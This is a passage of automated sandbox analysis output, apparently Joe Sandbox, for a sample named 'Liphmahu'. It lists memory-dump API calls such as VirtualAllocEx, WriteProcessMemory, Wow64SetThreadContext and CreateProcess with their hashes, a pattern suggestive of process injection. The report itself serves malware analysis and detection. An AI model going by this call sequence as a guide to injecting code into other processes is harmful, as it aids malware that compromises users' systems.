                                                                                  • Source File: 00000004.00000002.2216285902.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_6a20000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateProcess
                                                                                  • String ID:
                                                                                  • API String ID: 963392458-0
                                                                                  • Opcode ID: 68655f4fd363c457b19764e0e5b217873356a8e673e177d99a4557786319b1da
                                                                                  • Instruction ID: 62fecda4c804f4a53bda1dcfa22bd9efa0656d9a669cc0145f0fd9dfac03660b
                                                                                  • Opcode Fuzzy Hash: 68655f4fd363c457b19764e0e5b217873356a8e673e177d99a4557786319b1da
                                                                                  • Instruction Fuzzy Hash: 2C814471D8026A9FDB50DFA9C9817EEBBF1BF48310F248529E859EB254D7748881CF81
                                                                                  APIs
                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0091A57E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2192189377.0000000000910000.00000040.00000800.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_910000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID: HandleModule
                                                                                  • String ID:
                                                                                  • API String ID: 4139908857-0
                                                                                  • Opcode ID: 638abf60fb5611842d1f9feaba5877f3576ab030e0fda29e2fc4980972a2dcbb
                                                                                  • Instruction ID: 0bba5ef678f9d66caaeb21c65e5650d91b7baf496211d74c6b768c6fa0258d4c
                                                                                  • Opcode Fuzzy Hash: 638abf60fb5611842d1f9feaba5877f3576ab030e0fda29e2fc4980972a2dcbb
                                                                                  • Instruction Fuzzy Hash: A3813470A01B088FDB24DF29D04579ABBF5FF88304F00892DD48AD7A50D775E986CB91
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: $kq
                                                                                  • API String ID: 0-3037731980
                                                                                  • Opcode ID: 6c4ce11f50bbd2edf66167cf3e960ef2f2fd6d2755aa1098ae3308d1b71c01b0
                                                                                  • Instruction ID: 0abb9ef6a5673aa7f83b40a367a8163312e08851c643279f0f8ff48f505db794
                                                                                  • Opcode Fuzzy Hash: 6c4ce11f50bbd2edf66167cf3e960ef2f2fd6d2755aa1098ae3308d1b71c01b0
                                                                                  • Instruction Fuzzy Hash: 6BE1BD707082029FDB14AF29D865A7EBAB2FF84300F55446BF982CB395DA34DD46CB12
                                                                                  APIs
                                                                                  • CopyFileA.KERNEL32(?,?,?), ref: 06A246AD
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2216285902.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_6a20000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID: CopyFile
                                                                                  • String ID:
                                                                                  • API String ID: 1304948518-0
                                                                                  • Opcode ID: 4ca699f15fcbfdce150ee6ebb36fe6c1f07dad35e699f840271ea842240d6c44
                                                                                  • Instruction ID: 9f3123881e4208336cbc44ca9f19a3f996ac074be2e3adcdc22375b1ce3e2d8f
                                                                                  • Opcode Fuzzy Hash: 4ca699f15fcbfdce150ee6ebb36fe6c1f07dad35e699f840271ea842240d6c44
                                                                                  • Instruction Fuzzy Hash: CA519A70D4036A9FDB50DFA9C8857EEBBF1FF48310F148129E855AB294DB749881CB81
                                                                                  APIs
                                                                                  • CopyFileA.KERNEL32(?,?,?), ref: 06A246AD
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2216285902.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_6a20000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID: CopyFile
                                                                                  • String ID:
                                                                                  • API String ID: 1304948518-0
                                                                                  • Opcode ID: 6d2c49dead5200cdff62ae39fe90a68f648a0e6d1481e280dd60221758a6ca83
                                                                                  • Instruction ID: a5bd3357d8a5b1cccbdf383bfe55bc14f8de124fc958586562ae50a81e1f7696
                                                                                  • Opcode Fuzzy Hash: 6d2c49dead5200cdff62ae39fe90a68f648a0e6d1481e280dd60221758a6ca83
                                                                                  • Instruction Fuzzy Hash: 6D519A71D4036A8FDB50EFA9C8857AEBBF1FF48310F148129E855EB284DB749881CB81
                                                                                  APIs
                                                                                  • CreateFileA.KERNEL32(?,?,?,?,?,?,?), ref: 06A25409
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2216285902.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_6a20000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateFile
                                                                                  • String ID:
                                                                                  • API String ID: 823142352-0
                                                                                  • Opcode ID: 75d25732f2286da884dfb736d68f605532aff808f79c84f849fa24e01225a9b6
                                                                                  • Instruction ID: 7bcf938c9bd5502955e0e6945abba88f04d883c0f43bd8a2df1bb1b296dd0b55
                                                                                  • Opcode Fuzzy Hash: 75d25732f2286da884dfb736d68f605532aff808f79c84f849fa24e01225a9b6
                                                                                  • Instruction Fuzzy Hash: CE415871D4022A9FDB10DFA9C985BDEFBB2FF48310F148429E855AB254C7759481CF81
                                                                                  APIs
                                                                                  • CreateFileA.KERNEL32(?,?,?,?,?,?,?), ref: 06A25409
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2216285902.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_6a20000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateFile
                                                                                  • String ID:
                                                                                  • API String ID: 823142352-0
                                                                                  • Opcode ID: d02d379d9ad7d8dbfb4848f71f725ea0ae490f69a494a63a0a27cb397c55cc98
                                                                                  • Instruction ID: c0a85c95efb1231101908470d2cb559ca54528e1db65c587b764cb72c1febc59
                                                                                  • Opcode Fuzzy Hash: d02d379d9ad7d8dbfb4848f71f725ea0ae490f69a494a63a0a27cb397c55cc98
                                                                                  • Instruction Fuzzy Hash: CD4165B1D0026A9FDB10DFA9C985BDEFBF2FF08310F148429E855AA254DB759891CF81
                                                                                  APIs
                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0091CBD6,?,?,?,?,?), ref: 0091CC97
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2192189377.0000000000910000.00000040.00000800.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_910000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID: DuplicateHandle
                                                                                  • String ID:
                                                                                  • API String ID: 3793708945-0
                                                                                  • Opcode ID: 3ea721c709a5bb4160b7274b75dbc01d56272897d8aee35f129c55ad562615d6
                                                                                  • Instruction ID: 9a1ffbd4b157695f454d3c5f530004a4be7042d7054f8ef1ecda07fe91bd6147
                                                                                  • Opcode Fuzzy Hash: 3ea721c709a5bb4160b7274b75dbc01d56272897d8aee35f129c55ad562615d6
                                                                                  • Instruction Fuzzy Hash: CD419FB4B807448FEB109F60F8597A97BA9F759311F10886AFD059B3C9DBB48806CF10
                                                                                  APIs
                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06A25C44
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2216285902.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_6a20000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID: DuplicateHandle
                                                                                  • String ID:
                                                                                  • API String ID: 3793708945-0
                                                                                  • Opcode ID: 452504a7aecc054041620d25c97317ffb44882678b978810b39c3a877455ba88
                                                                                  • Instruction ID: 1c264b2f76eecb3a1fe1c88ebe9d5997f720ee254ab3947b1892eb72f52d310c
                                                                                  • Opcode Fuzzy Hash: 452504a7aecc054041620d25c97317ffb44882678b978810b39c3a877455ba88
                                                                                  • Instruction Fuzzy Hash: 072157718002599FCB10DFAAC881AEEBFF5FF48320F10842AE959A7250D7399954DBA5
                                                                                  APIs
                                                                                  • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 05D8EB50
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2208716476.0000000005D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D80000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5d80000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID: MemoryProcessWrite
                                                                                  • String ID:
                                                                                  • API String ID: 3559483778-0
                                                                                  • Opcode ID: a926da69d17ee4328990902ac168bd7b60b1ab2aebd6cb2e41845ec934c1ed4b
                                                                                  • Instruction ID: 5e048d84dbdb59fcc3eae581941d9c80a5c968ec84f662de4b0841ea4fd6082c
                                                                                  • Opcode Fuzzy Hash: a926da69d17ee4328990902ac168bd7b60b1ab2aebd6cb2e41845ec934c1ed4b
                                                                                  • Instruction Fuzzy Hash: AD212AB19003599FCB10DFA9C985BEEBBF5FF48320F14842AE959A7250C778A544CFA4
                                                                                  APIs
                                                                                  • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 05D8EB50
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2208716476.0000000005D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D80000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5d80000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID: MemoryProcessWrite
                                                                                  • String ID:
                                                                                  • API String ID: 3559483778-0
                                                                                  • Opcode ID: ac2c7fe28d70624c9569e32131ed7d0d477f9ecf74b88ddee9e3f974c714a3a5
                                                                                  • Instruction ID: 3d8f2bd9310172a6c98fa4ea8415c28306e5b9bf647dff0e782232a74fa53ae7
                                                                                  • Opcode Fuzzy Hash: ac2c7fe28d70624c9569e32131ed7d0d477f9ecf74b88ddee9e3f974c714a3a5
                                                                                  • Instruction Fuzzy Hash: 1A212A719003599FCB10DFA9C885BEEBBF5FF48310F14842AE959A7250C774A544CFA4
                                                                                  APIs
                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 06A25C44
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2216285902.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_6a20000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID: DuplicateHandle
                                                                                  • String ID:
                                                                                  • API String ID: 3793708945-0
                                                                                  • Opcode ID: b371300ecd7697a0f0b226ba4316416580981b9f64bb910e452315d7428646d9
                                                                                  • Instruction ID: 8c86c9dfee4f53693b49600cfac63b6453da26cbeb0c661a3050c0f9d7524dfa
                                                                                  • Opcode Fuzzy Hash: b371300ecd7697a0f0b226ba4316416580981b9f64bb910e452315d7428646d9
                                                                                  • Instruction Fuzzy Hash: 92217871C002599FCB10DFAAC880BEEBBF5FF48320F10842AE958A7250D7389554DFA4
                                                                                  APIs
                                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06A2FE66
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2216285902.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_6a20000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID: ContextThreadWow64
                                                                                  • String ID:
                                                                                  • API String ID: 983334009-0
                                                                                  • Opcode ID: 231b8f2ec4a376a580c3f01c342d26740f47823434c291335f3c7a50d33fa3d5
                                                                                  • Instruction ID: 28721d453295dec5ff46098b52673220fdd8013c3ff5de84494a0300055f7b4b
                                                                                  • Opcode Fuzzy Hash: 231b8f2ec4a376a580c3f01c342d26740f47823434c291335f3c7a50d33fa3d5
                                                                                  • Instruction Fuzzy Hash: C62125B1D003199FDB10DFAAC885BEEBFF5EB49324F108429D559A7241C7789944CFA4
                                                                                  APIs
                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0091CBD6,?,?,?,?,?), ref: 0091CC97
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2192189377.0000000000910000.00000040.00000800.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_910000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID: DuplicateHandle
                                                                                  • String ID:
                                                                                  • API String ID: 3793708945-0
                                                                                  • Opcode ID: 73f33f466b996ae6780f555c6c2e7e2f5e1edc1a64337f34a4a8c85c0c4b6ba9
                                                                                  • Instruction ID: fdcecab76d488c734c1014d421d23fcce0152a89ee516eff34966fdf399650eb
                                                                                  • Opcode Fuzzy Hash: 73f33f466b996ae6780f555c6c2e7e2f5e1edc1a64337f34a4a8c85c0c4b6ba9
                                                                                  • Instruction Fuzzy Hash: B32114B5900308EFDB10CF9AD984ADEBBF8EB48320F10841AE958B3310D375A940CFA5
                                                                                  APIs
                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0091CBD6,?,?,?,?,?), ref: 0091CC97
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2192189377.0000000000910000.00000040.00000800.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_910000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID: DuplicateHandle
                                                                                  • String ID:
                                                                                  • API String ID: 3793708945-0
                                                                                  • Opcode ID: 37c23bf18ea2e970528e225bab3947f1f580470f74b797a96704b3ad6b14c317
                                                                                  • Instruction ID: f7864c370bea375b1aa8b00ad5afa2f8e7adb73dff860874b9c1559f980ec1c7
                                                                                  • Opcode Fuzzy Hash: 37c23bf18ea2e970528e225bab3947f1f580470f74b797a96704b3ad6b14c317
                                                                                  • Instruction Fuzzy Hash: CF2114B59002489FDB10CFAAD984ADEBFF8EB48320F14845AE958A7310D374A941CFA5
                                                                                  APIs
                                                                                  • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06A2FE66
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2216285902.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_6a20000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID: ContextThreadWow64
                                                                                  • String ID:
                                                                                  • API String ID: 983334009-0
                                                                                  • Opcode ID: e2140d3a7ccaf016c562ca3f6b0f7a834aa7aa5603aa0f285d5ad5f09b743c49
                                                                                  • Instruction ID: a0c11eebc96c95af7141a344ac934484cab291fee8e33c029a53e2a6395908c3
                                                                                  • Opcode Fuzzy Hash: e2140d3a7ccaf016c562ca3f6b0f7a834aa7aa5603aa0f285d5ad5f09b743c49
                                                                                  • Instruction Fuzzy Hash: CF213871D003198FDB10DFAAC8857EEBBF4EF49324F108429D559A7241C7789944CFA4
                                                                                  APIs
                                                                                  • VirtualProtect.KERNELBASE(?,?,?,?), ref: 05D89514
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2208716476.0000000005D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D80000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5d80000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID: ProtectVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 544645111-0
                                                                                  • Opcode ID: 6bf4d42f93c0d58b34f1060d2adcc0517c0779f31dbcf3fe6c1e191f62910e9c
                                                                                  • Instruction ID: dc77f286b7a1f3d6081d7aa2c249cdd21e14f2bc8341900c0aa3f54d3bdb09aa
                                                                                  • Opcode Fuzzy Hash: 6bf4d42f93c0d58b34f1060d2adcc0517c0779f31dbcf3fe6c1e191f62910e9c
                                                                                  • Instruction Fuzzy Hash: 782138718003099FDB10DFAAC885BEEFBF4EF48320F10842AD459A7250DB389545CFA1
                                                                                  APIs
                                                                                  • VirtualProtect.KERNELBASE(?,?,?,?), ref: 05D89514
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2208716476.0000000005D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D80000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5d80000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID: ProtectVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 544645111-0
                                                                                  • Opcode ID: 2ce4bb90932e31bc2568a901826a6e91d627687f561ecf01cebf19b9bbd69e42
                                                                                  • Instruction ID: 7a786ed06ec6670adec0732d2138c7266d45c36402a4816b393e2336f52a1e51
                                                                                  • Opcode Fuzzy Hash: 2ce4bb90932e31bc2568a901826a6e91d627687f561ecf01cebf19b9bbd69e42
                                                                                  • Instruction Fuzzy Hash: 3A2115B18002099FDB10DFAAC984BEEBBF4EF48320F10842AD459A7250D7789545CFA5
                                                                                  APIs
                                                                                  • VirtualProtect.KERNEL32(?,?,?,?), ref: 067CFEE4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2215168226.00000000067C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_67c0000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID: ProtectVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 544645111-0
                                                                                  • Opcode ID: 76633a93b0d6b90b5b709f0d6ec9552c06baef7c2d07b8a76f902a3f04f6685e
                                                                                  • Instruction ID: 2b36e3ad787de0d2b6e896f8ad393314de9095f80bedae0316ce32a7535987b8
                                                                                  • Opcode Fuzzy Hash: 76633a93b0d6b90b5b709f0d6ec9552c06baef7c2d07b8a76f902a3f04f6685e
                                                                                  • Instruction Fuzzy Hash: 2A11F4B1D002499FCB10DFAAC984AAEFBF5EF48320F10842ED459A7250C779A944CFA5
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2208716476.0000000005D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D80000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5d80000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID: Sleep
                                                                                  • String ID:
                                                                                  • API String ID: 3472027048-0
                                                                                  • Opcode ID: d9c06785831d32497d463496a1dfbe8dc688262bfda601ae5555704f9d071303
                                                                                  • Instruction ID: b8b96f8426f33e80c741f6ec59d137f79c8f1a4d8b1b950e72ee5abab98faf27
                                                                                  • Opcode Fuzzy Hash: d9c06785831d32497d463496a1dfbe8dc688262bfda601ae5555704f9d071303
                                                                                  • Instruction Fuzzy Hash: 8E114CB19003598FDB10DFAAC8857EEFFF9EB48324F14842AD455A7350CB35A944CBA4
                                                                                  APIs
                                                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 05D8E88E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2208716476.0000000005D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D80000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5d80000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID: AllocVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 4275171209-0
                                                                                  • Opcode ID: c97fb7f72e52ccd599692390d99641fd0f121b088d845d1d1e8993c27750dc61
                                                                                  • Instruction ID: 8f88901d3af5c4e0e1d0f890f3bbb9b90787917a84ad2da00181cf460ae06124
                                                                                  • Opcode Fuzzy Hash: c97fb7f72e52ccd599692390d99641fd0f121b088d845d1d1e8993c27750dc61
                                                                                  • Instruction Fuzzy Hash: 56116A719003499FCB10DFAAC845BEEBFF5EF88324F10882AE555A7250C735A544CFA5
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2208716476.0000000005D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D80000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5d80000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID: Sleep
                                                                                  • String ID:
                                                                                  • API String ID: 3472027048-0
                                                                                  • Opcode ID: 212342803cd6584e48b1d6188aee2b0fc7989d1201df2a8c7be36d84b5b615f1
                                                                                  • Instruction ID: ff6c2c81de413f2652b85281fde1ce2c7e604c683b85b53f4067724be40a29cc
                                                                                  • Opcode Fuzzy Hash: 212342803cd6584e48b1d6188aee2b0fc7989d1201df2a8c7be36d84b5b615f1
                                                                                  • Instruction Fuzzy Hash: C5114CB19003598FDB10DFAAC4447EEFFF9AB48324F14841AD455A7250C7359944CBA4
                                                                                  APIs
                                                                                  • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 05D8E88E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2208716476.0000000005D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D80000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5d80000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID: AllocVirtual
                                                                                  • String ID:
                                                                                  • API String ID: 4275171209-0
                                                                                  • Opcode ID: 605f49b50a8c013458b68fa09053a600dfb5f7665d506962a5732636dd2ec3e5
                                                                                  • Instruction ID: 3732da5e1598ac65a5a150709a24a073b536511e9ccb76eb4cc596858a1d37a3
                                                                                  • Opcode Fuzzy Hash: 605f49b50a8c013458b68fa09053a600dfb5f7665d506962a5732636dd2ec3e5
                                                                                  • Instruction Fuzzy Hash: 431137719002499FCB10DFAAC844BEEBFF9EF88324F10881AE555A7250C775A544CFA5
                                                                                  APIs
                                                                                  • KiUserCallbackDispatcher.NTDLL(0000004B), ref: 00918E9D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2192189377.0000000000910000.00000040.00000800.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_910000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID: CallbackDispatcherUser
                                                                                  • String ID:
                                                                                  • API String ID: 2492992576-0
                                                                                  • Opcode ID: d7d2c07d981638ea98219e519795976f0864a3cb63ba80a863037929bafe8be2
                                                                                  • Instruction ID: 2e333000b718e6629a9a9cfa767ca537548cde9a7fc7ac0173a55a2a156e5f9e
                                                                                  • Opcode Fuzzy Hash: d7d2c07d981638ea98219e519795976f0864a3cb63ba80a863037929bafe8be2
                                                                                  • Instruction Fuzzy Hash: 2911DCB1804388CFDB20DF58D4043EABFF8EB19314F144099D489A3642C3799A49CBA6
                                                                                  APIs
                                                                                  • KiUserCallbackDispatcher.NTDLL(0000004B), ref: 00918E9D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2192189377.0000000000910000.00000040.00000800.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_910000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID: CallbackDispatcherUser
                                                                                  • String ID:
                                                                                  • API String ID: 2492992576-0
                                                                                  • Opcode ID: a8eb210eaddf536c7537f086a698a2af43f4f83aa168a469ecbdc2d213af7442
                                                                                  • Instruction ID: 7b37263ced87c4022990c84fe25fc3ceb4d5672a3b5818277cc3731f9b31a8b7
                                                                                  • Opcode Fuzzy Hash: a8eb210eaddf536c7537f086a698a2af43f4f83aa168a469ecbdc2d213af7442
                                                                                  • Instruction Fuzzy Hash: 55119DB1900398CFDB20DF59C5043EEBFF8EB09314F148499D989A3241C379AA48CBA6
                                                                                  APIs
                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0091A57E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2192189377.0000000000910000.00000040.00000800.00020000.00000000.sdmp, Offset: 00910000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_910000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID: HandleModule
                                                                                  • String ID:
                                                                                  • API String ID: 4139908857-0
                                                                                  • Opcode ID: dc13fc553d6fcd2e3567e993db741921dbd56d7c76e8ff0f59c34746d4630148
                                                                                  • Instruction ID: 0a9c53b6d66eba7ff911a6f8707b25fe7bfbbb09d7d3bd13a22946284c0f5439
                                                                                  • Opcode Fuzzy Hash: dc13fc553d6fcd2e3567e993db741921dbd56d7c76e8ff0f59c34746d4630148
                                                                                  • Instruction Fuzzy Hash: CF11E3B5D013498FCB10CF9AC444ADEFBF5EB48324F10845AD459A7210D379A945CFA5
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Plkq
                                                                                  • API String ID: 0-177148220
                                                                                  • Opcode ID: 6388a1ad1e8d6a80bb5f1d6ae6dd5995347394baa957b4bddf7e4ba946df97e1
                                                                                  • Instruction ID: f2579a0dc9f21d973a57fdbd00c9062270767288ef9e1d3102165d6bba1a1e34
                                                                                  • Opcode Fuzzy Hash: 6388a1ad1e8d6a80bb5f1d6ae6dd5995347394baa957b4bddf7e4ba946df97e1
                                                                                  • Instruction Fuzzy Hash: F6911434B006148FDB14DF29C884A6ABBF6FF89310B1544AAE506DB3B5DB71ED42CB91
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 4'kq
                                                                                  • API String ID: 0-3255046985
                                                                                  • Opcode ID: c6c690558ed616910dac7e64722d0b6ad3bca20e53e2c4f5fca0e55e8ce77ba6
                                                                                  • Instruction ID: 4130523a04ffb9777c6a530fc9ade3cd5b3efa2021cc78bf6d7e5dfd3a9a8463
                                                                                  • Opcode Fuzzy Hash: c6c690558ed616910dac7e64722d0b6ad3bca20e53e2c4f5fca0e55e8ce77ba6
                                                                                  • Instruction Fuzzy Hash: 42A1CB34B10218DFCB04EFA4D998A9DB7B2FF88305F55855AE406AB365DB30EC46CB90
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 4'kq
                                                                                  • API String ID: 0-3255046985
                                                                                  • Opcode ID: 2374dd8a5b5ad99b5d17a04e8fb9a5b20c1a5ae9b4c861b0323f52241d25eec6
                                                                                  • Instruction ID: 2a88b9598bcc30845b63060d5e2d9f345a6b5aabce9f1f9e6f1bf44777ccf001
                                                                                  • Opcode Fuzzy Hash: 2374dd8a5b5ad99b5d17a04e8fb9a5b20c1a5ae9b4c861b0323f52241d25eec6
                                                                                  • Instruction Fuzzy Hash: 21711C30B40214DFDB14DB68C994BAE7BB6EF88710F10846AE506AB395DF75DC42CB91
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000004.00000002.2208427016.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_4_2_5d60000_Liphmahu.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: (oq
                                                                                  • API String ID: 0-3175707579
                                                                                  • Opcode ID: e99a73015ce365633ad2c650f159432aba54a9aa1f52905416184ed0dca69418
                                                                                  • Instruction ID: 0bf252a0880f884cbf974651fac7dbb2064612ae5c319504685588b3be1571f3
                                                                                  • Opcode Fuzzy Hash: e99a73015ce365633ad2c650f159432aba54a9aa1f52905416184ed0dca69418
